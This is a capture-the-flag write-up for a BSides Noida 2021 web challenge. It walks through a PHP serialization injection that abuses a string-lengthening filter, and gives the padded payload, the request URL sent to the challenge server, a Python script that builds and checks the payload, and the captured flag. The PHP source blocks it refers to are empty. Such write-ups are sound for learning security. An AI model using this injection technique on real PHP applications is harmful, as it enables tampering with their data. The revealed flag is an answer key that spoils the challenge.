# Solution

There is nothing interesting on the web page itself, so I look at the page source

```html  
PLSSS DONT HACK ME!!!!!!

```

There is an HTML comment reading "**debug**"

So we try setting a "**debug**" HTTP query parameter

`34.88.85.200:4001/?debug`

We can see the source code  
```php  
  
  
```  
Let's understand the code  
```php

  
```  
The rest of the script just checks the `debug` HTTP parameter and, if it is set,
prints the source code

With the code understood, the goal is clear:

To get the **flag**, index 1 of the array returned by `unserialize` must be
`"V13tN4m_number_one "` (note the trailing space, which is why its serialized
length is `s:19`) instead of `"Fl4g_in_V13tN4m"`

Our *input* is concatenated straight into the *serialization format* stored in
`$ser` without any escaping, so we can do an **injection** attack!

But we can't simply send `";i:1;s:19:"V13tN4m_number_one ";}` because
`strlen($username)` returns the length of our whole payload, which is 34 bytes:
```
a:2:{i:0;s:strlen($username):"$username";...

becomes

a:2:{i:0;s:34:"";i:1;s:19:"V13tN4m_number_one ";}...
```
The integer after the **first** `s` must be the length of the **first** string.
`unserialize` reads exactly 34 bytes after the opening quote, so the whole
injected tail is consumed as element 0 and our fake element 1 is never parsed;
the original element 1 that follows it stays in place.

So it doesn't work

Luckily there is a `filter` function that replaces every "flag" with "flagcc",
growing the **first** string by 2 bytes per occurrence. It is called after
`strlen($username)` has already been computed, so we can pad the payload until
the *length* of the **first string** after filtering equals the result of
`strlen`: the tail is 34 bytes, so we need 34 / 2 = 17 copies of `flag`
(17 × 4 + 34 = 102 = 17 × 6)

With the lengths matched, the final *payload* looks like this

`flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}`

When we pass that *payload*
```
before passing to filter function
a:2:{i:0;s:102:"flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}...

after passing to filter function
a:2:{i:0;s:102:"flagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagccflagcc";i:1;s:19:"V13tN4m_number_one ";}...
```
The length of the **first** string `flagccflagcc...` is now 102, which equals the
integer after the **first** `s`, so `unserialize` closes element 0 exactly where
our injected `";` begins and then parses our injected element 1
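To check the arithmetic above without the live target, here is an added Python example (it is not part of the original writeup and not the challenge's real PHP). It models the server's behaviour as described on this page, `strlen` taken on the raw input before `filter` rewrites `flag` to `flagcc`, with a minimal `unserialize` for integers, strings and arrays that, like PHP, consumes exactly N bytes for `s:N:"..."`. The exact serialization template (our name at index 0, `Fl4g_in_V13tN4m` at index 1) and the `filter` behaviour are assumptions taken from the writeup's description; `build_payload` generalises the padding computation to any tail length and growth per replacement, and `len()` stands in for `strlen()` because the payload is pure ASCII.

```python
# Added example: models the challenge's vulnerable logic as the writeup
# describes it. Not the challenge's real PHP; the serialization template
# below is assumed (name at index 0, flag marker at index 1), and the
# payload is ASCII so len() equals strlen().

SECOND = 'Fl4g_in_V13tN4m'                    # value we need to replace (15 bytes)
TARGET = 'V13tN4m_number_one '                # 19 bytes incl. the trailing space
TAIL = '";i:1;s:19:"%s";}' % TARGET           # injected tail: 34 bytes, no "flag"


def php_filter(s: str) -> str:
    """Assumed model of the page's filter(): every 'flag' becomes 'flagcc'."""
    return s.replace('flag', 'flagcc')


def vulnerable_serialize(username: str) -> str:
    """Builds $ser the way the writeup describes: strlen() is computed on the
    raw input, and filter() only runs afterwards on the serialized string."""
    ser = 'a:2:{i:0;s:%d:"%s";i:1;s:%d:"%s";}' % (
        len(username), username, len(SECOND), SECOND)
    return php_filter(ser)


def unserialize(data: str):
    """Minimal model of PHP unserialize() for i:, s: and a: values.
    The property that matters here: s:N:"..." consumes exactly N bytes and
    then requires the closing '";', so a declared length that is too large
    swallows anything we inject. Trailing bytes after the top-level value
    are ignored, as PHP does."""
    pos = 0

    def expect(token: str) -> None:
        nonlocal pos
        if not data.startswith(token, pos):
            raise ValueError('expected %r at offset %d' % (token, pos))
        pos += len(token)

    def read_until(ch: str) -> str:
        nonlocal pos
        end = data.index(ch, pos)
        tok, pos = data[pos:end], end + 1
        return tok

    def value():
        nonlocal pos
        kind = data[pos]
        pos += 1
        expect(':')
        if kind == 'i':
            return int(read_until(';'))
        if kind == 's':
            n = int(read_until(':'))
            expect('"')
            s = data[pos:pos + n]          # exactly n bytes, whatever they contain
            pos += n
            expect('";')
            return s
        if kind == 'a':
            count = int(read_until(':'))
            expect('{')
            arr = {}
            for _ in range(count):
                key = value()
                arr[key] = value()
            expect('}')
            return arr
        raise ValueError('unsupported type %r' % kind)

    return value()


def build_payload(tail: str = TAIL, pad: str = 'flag', grow: int = 2) -> str:
    """Pads the injected tail so that strlen(input) equals the length of the
    padding *after* filter():  k*len(pad) + len(tail) == k*(len(pad) + grow),
    i.e. k = len(tail) / grow copies of the padding word (17 for this tail)."""
    if len(tail) % grow:
        raise ValueError('tail length must be a multiple of the growth per match')
    return pad * (len(tail) // grow) + tail


def second_element(username: str) -> str:
    """What the server would see at index 1 for a given ?name= value."""
    return unserialize(vulnerable_serialize(username))[1]


if __name__ == '__main__':
    print('naive tail  ->', repr(second_element(TAIL)))            # 'Fl4g_in_V13tN4m'
    print('padded tail ->', repr(second_element(build_payload())))  # 'V13tN4m_number_one '
```

The naive tail parses cleanly but leaves `Fl4g_in_V13tN4m` at index 1 because the declared `s:34` eats the entire injection as element 0; the padded payload parses to exactly the array the challenge wants. If the `filter` replacement grew the string by a different amount, only the `grow` argument changes.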

Send that **payload**!!!

`http://34.88.85.200:4001/?name=flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag%22;i:1;s:19:%22V13tN4m_number_one%20%22;}`

And there is the flag

![](https://raw.githubusercontent.com/MikelAcker/CTF_WRITEUPS_2021/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo/info.png)

*flag*: `BSNoida{3z_ch4all_46481684185_!!!!!!@!}`

Original writeup
(https://github.com/MikelAcker/CTF_WRITEUPS_2021/tree/main/BSides_Noida_CTF_2021_Writeup/Web/wowooo).